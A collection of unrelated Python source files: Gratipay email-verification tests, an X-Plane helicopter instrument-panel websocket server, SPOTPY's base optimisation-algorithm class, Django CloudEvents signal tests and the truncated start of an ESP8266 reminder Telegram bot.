assert ' connect alice@example.com to ' in text
# NB: The next two also exercise skipping the verification notice when
# sending package verification to an already-verified address, since the
# last email sent would be the verification notice if we didn't skip it.
def test_handles_verified_address_and_one_package(self):
self.preverify()
html, text = self.check('foo')
assert ' connect the <b>foo</b> npm package ' in html
assert ' connect the foo npm package ' in text
def test_handles_verified_address_and_multiple_packages(self):
self.preverify()
html, text = self.check('foo', 'bar')
assert ' connect 2 npm packages ' in html
assert ' connect 2 npm packages ' in text
def test_handles_unverified_address_and_one_package(self):
html, text = self.check('foo')
assert ' <b>alice@example.com</b> and the <b>foo</b> npm package ' in html
assert ' alice@example.com and the foo npm package ' in text
def test_handles_unverified_address_and_multiple_packages(self):
html, text = self.check('foo', 'bar')
assert ' <b>alice@example.com</b> and 2 npm packages ' in html
assert ' alice@example.com and 2 npm packages ' in text
class VerificationNotice(VerificationBase):
def setUp(self):
VerificationBase.setUp(self)
self.preverify('alice@gratipay.com')
def check(self, *a, **kw):
subject, html, text = VerificationBase.check(self, *a, **kw)
assert subject == 'New activity on your account'
assert ' notification sent to <b>alice@gratipay.com</b> because' in html
assert ' notification sent to alice@gratipay.com because' in text
return html, text
def test_sends_notice_for_new_address(self):
html, text = self.check()
assert ' connecting <b>alice@example.com</b> to ' in html
assert ' connecting alice@example.com to ' in text
def test_sends_notice_for_verified_address_and_one_package(self):
self.preverify()
html, text = self.check('foo')
assert ' connecting the <b>foo</b> npm package ' in html
assert ' connecting the foo npm package to ' in text
def test_sends_notice_for_verified_address_and_multiple_packages(self):
self.preverify()
html, text = self.check('foo', 'bar')
assert ' connecting 2 npm packages ' in html
assert ' connecting 2 npm packages ' in text
def test_sends_notice_for_unverified_address_and_one_package(self):
html, text = self.check('foo')
assert ' connecting <b>alice@example.com</b> and the <b>foo</b> npm package ' in html
assert ' connecting alice@example.com and the foo npm package ' in text
def test_sends_notice_for_unverified_address_and_multiple_packages(self):
html, text = self.check('foo', 'bar')
assert ' connecting <b>alice@example.com</b> and 2 npm packages ' in html
assert ' connecting alice@example.com and 2 npm packages ' in text
class PackageLinking(VerificationBase):
address = 'alice@example.com'
def start(self, address, *package_names):
packages = [self.make_package(name=name, emails=[address]) for name in package_names]
self.alice.start_email_verification(address, *packages)
return self.alice.get_email(address).nonce
@mock.patch('gratipay.project_review_process.ConsolePoster.post')
def check(self, *package_names):
package_names, post = package_names[:-1], package_names[-1]
post.return_value = 'some-github-url'
nonce = self.start(self.address, *package_names)
result = self.alice.finish_email_verification(self.address, nonce)
# email?
packages = [Package.from_names(NPM, name) for name in package_names]
assert result == (_email.VERIFICATION_SUCCEEDED, packages, True if packages else None)
assert self.alice.email_address == P('alice').email_address == self.address
# database?
for name in package_names:
package = Package.from_names(NPM, name)
assert package.team.package == package
assert package.team.review_url == 'some-github-url'
# GitHub issue?
npackages = len(package_names)
if npackages == 0:
assert not post.called
else:
assert post.call_count == 1
posted = json.loads(post.mock_calls[0][1][0])
if npackages == 1:
assert posted['title'] == 'foo'
assert 'for at least a week' in posted['body']
else:
assert posted['title'] == 'bar and foo'
assert 'for at least a week' in posted['body']
assert self.db.all('select review_url from teams') == ['some-github-url'] * npackages
def test_preverify_preverifies(self):
assert self.alice.email_address is None
self.preverify()
assert self.alice.email_address == self.address
def test_unverified_address_and_no_packages_succeeds(self):
self.check()
def test_unverified_address_and_one_package_succeeds(self):
self.check('foo')
def test_unverified_address_and_multiple_packages_succeeds(self):
self.check('bar', 'foo')
def test_verified_address_and_no_packages_is_a_no_go(self):
self.preverify()
raises(EmailAlreadyVerified, self.check)
def test_verified_address_and_one_package_succeeds(self):
self.preverify()
self.check('foo')
def test_verified_address_and_multiple_packages_succeeds(self):
self.preverify()
self.check('bar', 'foo')
def test_bob_cannot_steal_a_package_claim_from_alice(self):
foo = self.make_package()
self.alice.start_email_verification(self.address, foo)
nonce = self.alice.get_email(self.address).nonce
# u so bad bob!
bob = self.make_participant('bob', claimed_time='now')
bob.start_email_verification(self.address, foo)
result = bob.finish_email_verification(self.address, nonce) # using alice's nonce, even!
assert result == (_email.VERIFICATION_FAILED, None, None)
assert len(bob.get_teams()) == 0
result = self.alice.finish_email_verification(self.address, nonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], True)
teams = self.alice.get_teams()
assert len(teams) == 1
assert teams[0].package == foo
def test_while_we_are_at_it_that_packages_have_unique_teams_that_survive_comparison(self):
self.test_verified_address_and_multiple_packages_succeeds()
foo = Package.from_names('npm', 'foo')
bar = Package.from_names('npm', 'bar')
assert foo.team == foo.team
assert bar.team == bar.team
assert foo.team != bar.team
def test_finishing_email_verification_with_preexisting_paypal_doesnt_update_paypal(self):
self.add_and_verify_email(self.alice, self.address)
self.alice.set_paypal_address(self.address)
nonce = self.start(self.address, 'foo')
result = self.alice.finish_email_verification(self.address, nonce)
foo = Package.from_names('npm', 'foo')
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], False)
def test_deleting_package_removes_open_claims(self):
self.add_and_verify_email(self.alice, self.address)
self.alice.set_paypal_address(self.address)
self.start(self.address, 'foo')
_load = lambda: self.db.one('select * from claims')
assert _load() is not None
Package.from_names('npm', 'foo').delete()
assert _load() is None
def test_finishing_email_verification_is_thread_safe(self):
foo = self.make_package()
self.alice.start_email_verification(self.address, foo)
nonce = self.alice.get_email(self.address).nonce
results = {}
def finish():
key = threading.current_thread().ident
results[key] = self.alice.finish_email_verification(self.address, nonce)
def t():
t = threading.Thread(target=finish)
t.daemon = True
return t
go = Queue.Queue()
def monkey(self, *a, **kw):
team = old_get_or_create_linked_team(self, *a, **kw)
go.get()
return team
old_get_or_create_linked_team = Package.get_or_create_linked_team
Package.get_or_create_linked_team = monkey
try:
a, b = t(), t()
a.start()
b.start()
go.put('')
go.put('')
b.join()
a.join()
finally:
Package.get_or_create_linked_team = old_get_or_create_linked_team
assert results[a.ident] == (_email.VERIFICATION_SUCCEEDED, [foo], True)
assert results[b.ident] == (_email.VERIFICATION_REDUNDANT, None, None)
|
dataReceiver.py
|
#!/usr/bin/env python
# windows : pyinstaller -F dataReceiver.py --noupx --hidden-import graphics --hidden-import websockets --noconsole
import xpc
import json
import socket
import http.server
import webbrowser
import threading
import asyncio
import websockets
import graphics
import time
import types
app = types.SimpleNamespace()
app.name = "H145 panel"
app.connected_to_xplane = False
app.ip_address = "127.0.0.1"
app.http_port = 8080
app.ws_port = 8081
def check_xplane_connection():
while True:
print("Trying to connect to X-Plane...")
client = xpc.XPlaneConnect()
try:
# If X-Plane does not respond to the request, a timeout error
# will be raised.
client.getDREF("sim/test/test_float")
#
app.connected_to_xplane = True
return
except:
print("Error establishing connection to X-Plane.")
print("Retrying...")
time.sleep(10)
def window_connecting():
win = graphics.GraphWin('H145 External Panel', 350, 350) # give title and dimensions
# make right side up coordinates!
xplane = graphics.Text(graphics.Point(60, 20), 'X-Plane 11 : ')
connected_message = 'Not connected'
connected = graphics.Text(graphics.Point(160, 20), connected_message)
connected.setTextColor('red')
xplane.draw(win)
connected.draw(win)
check_xplane_connection()
win.close()
window_connected()
def window_connected():
win = graphics.GraphWin('H145 External Panel', 350, 350) # give title and dimensions
xplane = graphics.Text(graphics.Point(60, 20), 'X-Plane 11 : ')
connected_message = 'Connected'
connected = graphics.Text(graphics.Point(160, 20), connected_message)
connected.setTextColor('green')
xplane.draw(win)
connected.draw(win)
open_browser = graphics.Text(graphics.Point(win.getWidth() / 2, 100), 'Open in browser\n\nor')
open_browser.draw(win)
open_device = graphics.Text(graphics.Point(win.getWidth() / 2, 180),
"digit the following into a web browser :\n\n http://" + str(app.ip_address) + ":" + str(
app.http_port) + "/app/")
open_device.draw(win)
while app.connected_to_xplane:
point = win.getMouse()
if 110 < point.getX() < 240 and 70 < point.getY() < 95:
url = "http://" + str(app.ip_address) + ":" + str(app.http_port) + "/app/index.html"
webbrowser.open(url, new=2)
win.close()
window_connecting()
async def send_data(websocket, path):
print("Connection to X-Plane", flush=True)
while not app.connected_to_xplane:
await asyncio.sleep(1)
client1 = xpc.XPlaneConnect()
grossWt = "sim/flightmodel/weight/m_total"
totalFuel = "sim/flightmodel/weight/m_fuel_total"
egt = "sim/flightmodel2/engines/ITT_deg_C"
n1 = "sim/cockpit2/engine/indicators/N1_percent"
n2 = "sim/cockpit2/engine/indicators/N2_percent"
tq = "sim/cockpit2/engine/indicators/torque_n_mtr"
oilPress = "sim/cockpit2/engine/indicators/oil_pressure_psi"
fuelTanks = "sim/flightmodel/weight/m_fuel"
fuelFlow = "sim/cockpit2/engine/indicators/fuel_flow_kg_sec"
oilTemp = "sim/cockpit2/engine/indicators/oil_temperature_deg_C"
oilQty = "sim/flightmodel/engine/ENGN_oil_quan"
lat = "sim/flightmodel/position/latitude"
lon = "sim/flightmodel/position/longitude"
hdg = "sim/flightmodel/position/true_psi"
hyd1 = "sim/cockpit2/hydraulics/indicators/hydraulic_pressure_1"
hyd2 = "sim/cockpit2/hydraulics/indicators/hydraulic_pressure_2"
gen = "sim/cockpit2/electrical/generator_amps"
genOn = "sim/cockpit/electrical/generator_on"
bat = "sim/cockpit2/electrical/battery_voltage_actual_volts"
mgbPress = "sim/flightmodel/transmissions/xmsn_press"
mgbTemp = "sim/flightmodel/transmissions/xmsn_temp"
payload = "sim/flightmodel/weight/m_fixed"
pressure = "sim/weather/barometer_current_inhg"
temperature = "sim/weather/temperature_ambient_c"
while True:
values = dict()
try:
res = client1.getDREFs([egt, n1, n2, tq, fuelTanks, fuelFlow, oilTemp, oilPress, oilQty, lat, lon, hyd1, hyd2, genOn, gen, bat, mgbTemp, mgbPress, hdg, grossWt, totalFuel, payload, pressure, temperature])
values["egt_1"] = round(res[0][0], 0)
values["egt_2"] = round(res[0][1], 0)
values["n1_1"] = "{:.1f}".format(round(res[1][0], 1))
values["n1_2"] = "{:.1f}".format(round(res[1][1], 1))
values["n2_1"] = "{:.1f}".format(abs(round(res[2][0], 1)))
values["n2_2"] = "{:.1f}".format(abs(round(res[2][1], 1)))
values["trq_1"] = "{:.1f}".format(abs(round(res[3][0]/118.5, 1)))
values["trq_2"] = "{:.1f}".format(abs(round(res[3][1]/118.5, 1)))
values["fuel_0"] = round(res[4][0] / 2, 0)
values["fuel_1"] = round(res[4][1], 0)
values["fuel_2"] = round(res[4][0] / 2, 0)
values["fuelf_0"] = round(res[5][0] * 3600 / 2, 0)
values["fuelf_1"] = round(res[5][1] * 3600 / 2, 0)
values["oiltemp_1"] = "{:.1f}".format(round(res[6][0], 1))
values["oiltemp_2"] = "{:.1f}".format(round(res[6][1], 1))
values["oilpress_1"] = round(res[7][0], 1)
values["oilpress_2"] = round(res[7][1], 1)
values["oil_1"] = round(res[8][0], 1)
values["oil_2"] = round(res[8][1], 1)
values["lat"] = round(res[9][0], 4)
values["lon"] = round(res[10][0], 4)
values["hyd_1"] = round(res[11][0], 2)
values["hyd_2"] = round(res[12][0], 2)
values["gen_1"] = res[13][0]
values["gen_2"] = res[13][1]
values["genamps_1"] = "{:.1f}".format(round(res[14][0], 1))
values["genamps_2"] = "{:.1f}".format(round(res[14][1], 1))
values["bat"] = "{:.1f}".format(round(res[15][0], 1))
values["mgb_t"] = "{:.1f}".format(round(res[16][0], 1))
values["mgb_p"] = "{:.1f}".format(round(res[17][0], 1))
values["hdg"] = "{:0>3.0f}".format(round(res[18][0], 0))
values["weight"] = round(res[19][0], 0)
values["fuel_t"] = round(res[20][0], 0)
values["weight_p"] = round(res[21][0], 0)
values["weight_e"] = round(res[19][0] - res[20][0] - res[21][0], 0)
values["pressure"] = "{:.2f}".format(res[22][0])
values["temperature"] = "{:.1f}".format(res[23][0])
except ValueError:
print("ValueError, reconnecting to X-Plane")
values = {}
except socket.timeout:
print("Socket timeout")
values = {}
except Exception as inst:
print(type(inst))
print(inst.args)
#client = xpc.XPlaneConnect()
continue
json_val = json.dumps(values)
await websocket.send(json_val)
await asyncio.sleep(0.10)
def main():
app.connected_to_xplane = False
app.ip_address = socket.gethostbyname(socket.gethostname())
print("H145panel connecting to sim")
f_conf = open("app/conf.json", "w")
json.dump({"ip": app.ip_address, "port": app.ws_port}, f_conf)
f_conf.close()
print("computer address %s" % app.ip_address)
handler = http.server.SimpleHTTPRequestHandler
httpd = http.server.socketserver.TCPServer(("", app.http_port), handler)
print("serving at port", app.http_port)
threading.Thread(target=httpd.serve_forever, daemon=True).start()
start_server = websockets.serve(send_data, app.ip_address, app.ws_port)
asyncio.get_event_loop().run_until_complete(start_server)
threading.Thread(target=asyncio.get_event_loop().run_forever, daemon=True).start()
window_connecting()
if __name__ == "__main__":
main()
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database, objectivefunctions
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
# If the running python version is 2.* we have only Queue available as a multiprocessing class
# we need to stop the whole main process which this sleep for one microsecond otherwise the subprocess is not
# finished and the main process can not access it and put it as garbage away (Garbage collectors cause)
# However this slows down the whole simulation process and is a boring bug. Python3.x does not need this
# workaround
from Queue import Queue
class _RunStatistic(object):
"""
this class checks for each run if the objectivefunction got better and holds the
best parameter set.
Every _algorithm has an object of this class as status.
Usage:
status = _RunStatistic()
status(rep,like,params)
"""
def __init__(self):
self.rep = 0
self.params = None
self.objectivefunction = -1e308
self.bestrep = 0
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = None
def __call__(self, rep, objectivefunction, params):
self.curparmeterset = params
self.rep+=1
if type(objectivefunction) == type([]):
if objectivefunction[0] > self.objectivefunction:
# Show only the first best objectivefunction when working with
# more than one objectivefunction
self.objectivefunction = objectivefunction[0]
self.params = params
self.bestrep = self.rep
else:
if objectivefunction > self.objectivefunction:
self.params = params
self.objectivefunction = objectivefunction
self.bestrep = self.rep
self.print_status()
def print_status(self):
# get str showing approximate timeleft to end of simulation in H, M, S
acttime = time.time()
# Refresh progressbar every two second
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
text = '%i of %i (best like=%g) est. time remaining: %s' % (self.rep, self.repetitions,
self.objectivefunction, timestr)
print(text)
self.last_print = time.time()
def __repr__(self):
return 'Best objectivefunction: %g' % self.objectivefunction
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast suited for short sampling time. no file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
mpi: Message Passing Interface: Parallel computing on high performance computing clusters, py4mpi needs to be installed
save_thresholde: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
alt_objfun: str or None, default: 'rmse'
alternative objectivefunction to be used for algorithm
* None: the objfun defined in spot_setup.objectivefunction is used
* any str: if str is found in spotpy.objectivefunctions,
this objectivefunction is used, else falls back to None
e.g.: 'log_p', 'rmse', 'bias', 'kge' etc.
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
If the model run has been broken simlply '[nan]' will be returned.
random_state: int or None, default: None
the algorithms uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
parallel='seq', save_sim=True, alt_objfun=None, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,sim_timeout = None,
random_state=None):
# Initialize the user defined setup class
self.setup = spot_setup
self.model = self.setup.simulation
# Philipp: Changed from Tobi's version, now we are using both new class defined parameters
# as well as the parameters function. The new method get_parameters
# can deal with a missing parameters function
#
# For me (Philipp) it is totally unclear why all the samplers should call this function
# again and again instead of
# TODO: just storing a definite list of parameter objects here
self.parameter = self.get_parameters
self.parnames = self.parameter()['name']
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.get_namedtuple_from_paramnames(
self.setup, self.parnames)
# use alt_objfun if alt_objfun is defined in objectivefunctions,
# else self.setup.objectivefunction
self.objectivefunction = getattr(
objectivefunctions, alt_objfun or '', None) or self.setup.objectivefunction
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'custom'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
self.dbinit = dbinit
# Set the random state
if random_state is None:
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If value is not None a timeout will set so that the simulation will break after sim_timeout seconds without return a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
self.dbinit = False
self.breakdata = self.read_breakdata(self.dbname)
# Now a repeater (ForEach-object) is loaded
# A repeater is a convinent wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos mutiprocessing and uses ordered map, so results are given back in the order
# as the parameters are
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos mutiprocessing and uses unordered map, so results are given back in the order
# as the subprocesses are finished which may speed up the whole simulation process but is not recommended if
# objective functions do their calculation based on the order of the data because the order of the result is chaotic
# and randomized
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
self.status = _RunStatistic()
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
return parameter.get_parameters_array(self.setup)
def set_repetiton(self, repetitions):
self.status.repetitions = repetitions
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
print('End of sampling')
text = 'Best run at %i of %i (best like=%g) with parameter set:' % (
self.status.bestrep, self.status.repetitions, self.status.objectivefunction)
print(text)
print(self.status.params)
text = 'Duration:' + str(round((time.time() - self.status.starttime), 2)) + ' s'
print(text)
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations, save_sim=self.save_sim,
dbinit=self.dbinit, db_precision=self.db_precision, setup=self.setup)
self.dbinit = False
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
#try if like is a list of values compare it with save threshold setting
try:
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
#If like value is not a iterable, it is assumed to be a float
except TypeError: # This is also used if not threshold was set
try:
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
except TypeError:# float/list would result in an error, because it does not make sense
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
return pickle.load(breakfile)
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def postprocessing(self, rep, randompar, simulation, chains=1, save=True, negativlike=False):
like = self.getfitness(simulation=simulation, params=randompar)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
if save is True:
if negativlike is True:
self.save(-like, randompar, simulations=simulation, chains=chains)
self.status(rep, -like, randompar)
else:
self.save(like, randompar, simulations=simulation, chains=chains)
self.status(rep, like, randompar)
if type(like)==type([]):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.model(self.partype(*params)))
# starting a queue, where in python2.7 this is a multiprocessing class and can cause errors because of
# incompability which the main thread. Therefore only for older Python version a workaround follows
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None the self.model will break after self.sim_timeout seconds otherwise is runs as
# long it needs to run
sim_thread.join(self.sim_timeout)
# If no result from the thread is given, i.e. the thread was killed from the watcher the default result is
# '[nan]' otherwise get the result from the thread
model_result = [np.NAN]
if not que.empty():
model_result = que.get()
return id, params, model_result
|
tests.py
|
import io
import json
from django.db.models.signals import *
from django.test import TestCase, override_settings
from django_signals_cloudevents import send_cloudevent
import os
from django_fake_model import models as f
from django.db import models
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
import requests
from cloudevents.sdk import marshaller
from cloudevents.sdk.converters import binary
from cloudevents.sdk.event import v1
ALLOWED_EVENT_TYPES = (
"django.orm.pre_init",
"django.orm.post_init",
"django.orm.pre_save",
"django.orm.post_save",
"django.orm.m2m_change",
"django.orm.pre_delete",
"django.orm.post_delete",
"django.orm.pre_migrate",
"django.orm.post_migrate",
)
class FakeSourceModel(f.FakeModel):
name = models.CharField(max_length=100)
enabled = models.BooleanField()
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
# Process an HTTP POST request and return a response with an HTTP 200 status.
content_len = int(self.headers.get('Content-Length'))
request_body = self.rfile.read(content_len)
m = marshaller.NewHTTPMarshaller([binary.NewBinaryHTTPCloudEventConverter()])
event = m.FromRequest(v1.Event(), self.headers, io.BytesIO(request_body), lambda x: json.load(x))
event_type = event.EventType()
assert event_type in ALLOWED_EVENT_TYPES
extensions = event.Extensions()
extensions["djangoapp"] = FakeSourceModel._meta.app_label
extensions["djangomodel"] = FakeSourceModel._meta.model_name
event_data = event.Data()
if event_type in ("django.orm.post.init", "django.orm.pre.save", "django.orm.post.save",
"django.orm.pre.delete", "django.orm.post.delete", "django.orm.m2m.change"):
assert "data" in event_data
instance_data = event_data["data"]
assert "id" in instance_data and "name" in instance_data and "enabled" in instance_data
assert event_data["db_table"] == FakeSourceModel._meta.db_table
check_expected_kwargs(event_type, event_data["signal_kwargs"])
self.send_response(requests.codes.ok)
self.end_headers()
return
def check_expected_kwargs(event_type, kwargs):
if event_type == "django.orm.pre_init":
assert len(kwargs) == 2 and all(k in kwargs for k in ("args", "kwargs"))
elif event_type == "django.orm.post_init":
assert len(kwargs) == 0
elif event_type == "django.orm.pre_save":
assert len(kwargs) == 3 and all(k in kwargs for k in ("update_fields", "raw", "using"))
elif event_type == "django.orm.post_save":
assert len(kwargs) == 4 and all(k in kwargs for k in ("created", "update_fields", "raw", "using"))
elif event_type in ("django.orm.pre_delete", "django.orm.post_delete"):
assert len(kwargs) == 1 and "using" in kwargs
elif event_type == "django.orm.m2m_change":
assert len(kwargs) == 5 and all(k in kwargs for k in ("action", "reverse", "model", "pk_set", "using"))
elif event_type in ("django.orm.pre_migrate", "django.orm.post_migrate"):
assert len(kwargs) == 6 and all(k in kwargs for k in ("app_config", "verbosity", "interactive", "using",
"apps", "plan"))
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
@override_settings(
CLOUDEVENTS_ENV={
"SINK_VAR": "MOCK_SINK",
"SOURCE_VAR": "TEST_SOURCE"
}
)
class SourceTestCase(TestCase):
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port), MockServerRequestHandler)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
os.environ["MOCK_SINK"] = "http://localhost:%s" % self.mock_server_port
os.environ["TEST_SOURCE"] = "test-orm-source"
pre_init.connect(send_cloudevent, sender=FakeSourceModel)
post_init.connect(send_cloudevent, sender=FakeSourceModel)
pre_save.connect(send_cloudevent, sender=FakeSourceModel)
post_save.connect(send_cloudevent, sender=FakeSourceModel)
pre_delete.connect(send_cloudevent, sender=FakeSourceModel)
post_delete.connect(send_cloudevent, sender=FakeSourceModel)
@FakeSourceModel.fake_me
def test_send_event(self):
fake_source = FakeSourceModel.objects.create(name="fake_source", enabled=True)
fake_source.enabled = False
fake_source.save()
fake_source.delete()
|
esp8266.py
|
import pyrebase, json, threading, telegram, os, time
from telegram.ext.updater import Updater
from telegram.update import Update
from telegram.ext.callbackcontext import CallbackContext
from telegram.ext.commandhandler import CommandHandler
from telegram.ext.messagehandler import MessageHandler
from telegram.ext.filters import Filters
from datetime import datetime, timedelta
from zoneinfo import ZoneInfo
from dotenv import load_dotenv
load_dotenv()
apiKey = os.getenv('apiKey')
authDomain = os.getenv('authDomain')
databaseURL = os.getenv('databaseURL')
storageBucket = os.getenv('storageBucket')
TOKEN = os.getenv('TOKEN')
userId = os.getenv('userId')
updater = Updater(TOKEN, use_context=True)
global pirMotionCount
pirMotionCount = 0
firebaseConfig = {
"apiKey": apiKey,
"authDomain": authDomain,
"databaseURL": databaseURL,
"storageBucket": storageBucket,
};
print('Started telegram bot successfully at ' + str(datetime.now()))
telegramBot = telegram.Bot(token = TOKEN)
def indexKeyHelp(update: Update, context: CallbackContext):
update.message.reply_text("""currentDate keys :-
* 0 morningStatus
* 1 afternoonStatus
* 2 nightStatus
* 3 morningTelegramAlert
* 4 afternoonTelegramAlert
* 5 nightTelegramAlert
* 6 morningStatusT
* 7 afternoonStatusT
* 8 nightStatusT
*
* timings keys
* 0 morningTabletAlertH
* 1 morningTabletAlertM
* 2 afternoonTabletAlertH
* 3 afternoonTabletAlertM
* 4 nightTabletAlertH
* 5 nightTabletAlertM
* 6 morningTiffinAlertH
* 7 morningTiffinAlertM
* 8 afternoonLunchAlertH
* 9 afternoonLunchAlertM
* 10 nightDinnerAlertH
* 11 nightDinnerAlertM""")
def sendToTelegram(message):
telegramBot.send_message(chat_id = userId, text = message)
def start(update: Update, context: CallbackContext):
update.message.reply_text(
"Hello , Welcome to the Food and Medicine Remainder using ESP8266 Telegram Bot. Please write\
/help to see the commands available.")
def help(update: Update, context: CallbackContext):
update.message.reply_text("""Available Commands :-
/showLog - shows log data of that particular day
/update - updates timings with key and value provided
/index - shows the index assigned for currentdate and timings""")
def unknown_text(update: Update, context: CallbackContext):
update.message.reply_text(
"Sorry I can't recognize you , you said '%s'" % update.message.text)
def showLog(update: Update, context: CallbackContext) :
date = ' '.join(update.message.text.split(' ',1)[1:])
if date != None and date != ' ':
log = db.child(date).get().val()
if(log != None):
update.message.reply_text(json.dumps(log, indent=4))
else:
update.message.reply_text("Invalid date entered or entered date not registered in firebase, Try again with format '7 December 2021'")
else:
update.message.reply_text("No date entered, Try again with format '7 December 2021'")
def pirLog(update: Update, context: CallbackContext) :
date = ' '.join(update.message.text.split(' ',1)[1:])
if date != None and date != ' ':
log = db.child("pirStatus").child(date).get().val()
if(log != None):
update.message.reply_text(json.dumps(log, indent=4))
else:
update.message.reply_text("Invalid date entered or entered date not registered in firebase, Try again with format '7 December 2021'")
else:
update.message.reply_text("No date entered, Try again with format '7 December 2021'")
def updatetimings(update: Update, context: CallbackContext):
lst = update.message.text.split(' ')[1:]
if(len(lst) % 2 == 0):
for i in range(0, len(lst), 2):
db.child('timings').update({lst[i] : int(lst[i + 1])})
update.message.reply_text("Updated index " + lst[i] + " with " + lst[i+1] + " successfully")
else:
update.message.reply_text("Passed arguments are not sufficient, try again!")
def unknown(update, context):
user = str(update.effective_chat.id)
if user == userId:
context.bot.send_message(chat_id = user, text="Sorry, I didn't understand that command.")
else:
context.bot.send_message(chat_id = user, text="Hey! This bot is not for you")
firebase = pyrebase.initialize_app(firebaseConfig)
db = firebase.database()
def telegramBotInit():
